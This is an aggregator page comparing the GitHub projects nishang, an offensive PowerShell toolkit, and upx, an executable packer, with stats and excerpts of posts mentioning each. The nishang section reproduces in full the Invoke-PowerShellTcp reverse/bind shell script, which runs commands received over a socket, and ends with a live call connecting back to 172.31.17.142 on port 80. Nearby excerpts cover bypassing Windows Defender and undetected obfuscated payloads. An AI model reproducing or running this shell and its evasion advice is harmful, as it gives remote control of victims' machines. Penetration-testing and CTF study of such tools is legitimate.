nishang
upx
Our great sponsors
nishang | upx | |
---|---|---|
15 | 30 | |
8,336 | 13,395 | |
- | 2.6% | |
0.0 | 9.5 | |
4 days ago | 3 days ago | |
PowerShell | C++ | |
GNU General Public License v3.0 or later | GNU General Public License v3.0 or later |
Stars - the number of stars that a project has on GitHub. Growth - month over month growth in stars.
Activity is a relative number indicating how actively a project is being developed. Recent commits have higher weight than older ones.
For example, an activity of 9.0 indicates that a project is amongst the top 10% of the most actively developed projects that we are tracking.
nishang
- PowerShell evasion
-
Bypassing Windows Defender (10 Ways)
function Invoke-PowerShellTcp { <# .SYNOPSIS Nishang script which can be used for Reverse or Bind interactive PowerShell from a target. .DESCRIPTION This script is able to connect to a standard netcat listening on a port when using the -Reverse switch. Also, a standard netcat can connect to this script Bind to a specific port. The script is derived from Powerfun written by Ben Turner & Dave Hardy .PARAMETER IPAddress The IP address to connect to when using the -Reverse switch. .PARAMETER Port The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens. .EXAMPLE PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444 Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on the given IP and port. .EXAMPLE PS > Invoke-PowerShellTcp -Bind -Port 4444 Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port. .EXAMPLE PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444 Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be listening on the given IP and port. .LINK http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html https://github.com/nettitude/powershell/blob/master/powerfun.ps1 https://github.com/samratashok/nishang #> [CmdletBinding(DefaultParameterSetName="reverse")] Param( [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")] [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")] [String] $IPAddress, [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")] [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")] [Int] $Port, [Parameter(ParameterSetName="reverse")] [Switch] $Reverse, [Parameter(ParameterSetName="bind")] [Switch] $Bind ) try { #Connect back if the reverse switch is used. if ($Reverse) { $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port) } #Bind to the provided port if Bind switch is used. if ($Bind) { $listener = [System.Net.Sockets.TcpListener]$Port $listener.start() $client = $listener.AcceptTcpClient() } $stream = $client.GetStream() [byte[]]$bytes = 0..65535|%{0} #Send back current username and computername $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n") $stream.Write($sendbytes,0,$sendbytes.Length) #Show an interactive PowerShell prompt $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>') $stream.Write($sendbytes,0,$sendbytes.Length) while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding $data = $EncodedText.GetString($bytes,0, $i) try { #Execute the command on the target. $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String ) } catch { Write-Warning "Something went wrong with execution of command on the target." Write-Error $_ } $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> ' $x = ($error[0] | Out-String) $error.clear() $sendback2 = $sendback2 + $x #Return the results $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) $stream.Write($sendbyte,0,$sendbyte.Length) $stream.Flush() } $client.Close() if ($listener) { $listener.Stop() } } catch { Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." Write-Error $_ } } Invoke-PowerShellTcp -Reverse -IPAddress 172.31.17.142 -Port 80
- Powershell scripts suggestions!
-
TryHackMe Flatline Walkthrough
Save this file https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
-
Discrepancies in detecting obfuscated payloads by Windows Defender?
After that I expanded my research and tried a payload from GitHub user samratashok and followed this Guide in which only the text encoding method is altered from ASCII to UTF8. And guess what? It actually worked, Windows Defender does not detect it!
- Using Nishang with Pastebin | Help
- Ideas on how to in-line inspect base64 for malicious code?
- Nishang - PowerShell ofensivo para #redteam, las pruebas de penetración y la seguridad ofensiva 💯
-
Writeup: HackTheBox Bounty - Without Metasploit (OSCP Prep)
I am going to copy/paste the following nishang Reverse Shell in the newly created file link.
- Why is this reverse shell not working?
upx
-
PicoCTF 2024: packer
According to this source:
-
The Trade-Offs of Optimizing and Compressing Go Binaries
Following optimization, tools like UPX can compress the resulting binary, significantly reducing file size. This compression is invaluable for resource-constrained environments but adds a decompression step during binary execution.
- Tradutor Automático de legendas
-
Obfuscation & Executable Compression in Go
I have been using UPX but I'm quite sure if there's something out there that offers better compression.
-
My website is one binary
Ah that's nice, long ago I used parchment.js to load a inform7 created z5 file on my website. You could try to compress your executable with upx https://upx.github.io/
-
Bypassing Windows Defender (10 Ways)
In this process, the given packer tool embeds a natively compiled PE into another executable that contains the information needed to unpack the original content and execute it. Perhaps the most well known packer, which is not even for malicious purposes, is Golang's UPX package.
-
How do you guys deal with protecting source code for your game when launch into steam or mobile platform?
Rewrite in C#, and use an obfuscator on the DLL. You can also write some parts in C++ as many variable and function names are forgotten when compiling. You should also encrypt the PCK, and see if you can embed it. If it's embedded, you can make it more annoying to deal with by packing it with https://upx.github.io/
-
Encrypted file in OneDrive Personal Vault Detected as Ransomware.
Another good example of false positives like this would be binaries that are compressed with UPX - the way it works is apparently very similar to how stub-loader malware operates and signature detection tools will flag it as malicious.
-
REST API in RUST with ntex
This will optimise the release binary to be as small as possible. Additionally with upx we can create really small docker image !
-
help packing sound in <4k
Then I compressed it with upx, cp small.exe smallUpx.exe && upx --brute smallUpx.exe, got a 10752 bytes executable, half the size, but still pretty large
What are some alternatives?
powershell-universal - PowerShell Universal is the ultimate platform for building web-based IT tools.
rust - Empowering everyone to build reliable and efficient software.
AdminToolbox - Repository for the AdminToolbox PowerShell Modules
rust-sdl2 - SDL2 bindings for Rust
ConPtyShell - ConPtyShell - Fully Interactive Reverse Shell for Windows
legion - High performance Rust ECS library
psPAS - PowerShell module for CyberArk Privileged Access Security REST API
Lean and Mean Docker containers - Slim(toolkit): Don't change anything in your container image and minify it by up to 30x (and for compiled languages even more) making it secure too! (free and open source)
universal-dashboard - Build beautiful websites with PowerShell.
distroless - 🥑 Language focused docker images, minus the operating system.
PoshC2 - A proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.
fpm - Effing package management! Build packages for multiple platforms (deb, rpm, etc) with great ease and sanity.